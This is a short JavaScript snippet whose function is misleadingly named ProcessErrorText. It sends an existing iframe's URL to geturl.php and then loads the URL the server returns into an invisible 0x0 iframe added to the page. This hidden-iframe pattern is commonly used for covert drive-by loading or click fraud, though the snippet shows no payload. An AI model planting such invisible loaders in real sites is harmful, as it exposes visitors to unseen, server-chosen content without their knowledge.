function ProcessErrorText ()
{
  try
  {
    var rnd = Math.random ()*100;
    var myUrl = "";
    var iframes = "test";
    iframes = document.getElementsByTagName("iframe");
    rnd = Math.round(rnd);
    var rnd2 = rnd % 3;
    rnd = (rnd % iframes.length);
    //myUrl = iframes[rnd].src;
    myUrl = iframes[1].src;
    myUrl = encodeURIComponent(myUrl);
    var xmlHttp = null;
  }
  catch (e)
  {
  }
  
  if (2 == 2)
  {  
    if (typeof XMLHttpRequest != 'undefined') {
        xmlHttp = new XMLHttpRequest();
    }
    if (!xmlHttp) {
        // Internet Explorer 6 und älter
        try {
            xmlHttp  = new ActiveXObject("Msxml2.XMLHTTP");
        } catch(e) {
            try {
                xmlHttp  = new ActiveXObject("Microsoft.XMLHTTP");
            } catch(e) {
                xmlHttp  = null;
            }
        }
    }
    if (xmlHttp) {
        xmlHttp.open('POST', 'geturl.php?myUrl='+myUrl, true);
        xmlHttp.onreadystatechange = function () {
            if (xmlHttp.readyState == 4) {
                try
                {
                  var iframe = document.createElement("iframe");
                  iframe.src = xmlHttp.responseText;
                  iframe.width = 0;
                  iframe.height = 0;
                  document.getElementById("body").appendChild (iframe);
                 }
                catch (ex)
                {
                }
            }
        };
        xmlHttp.send(null);
    }
  }
}
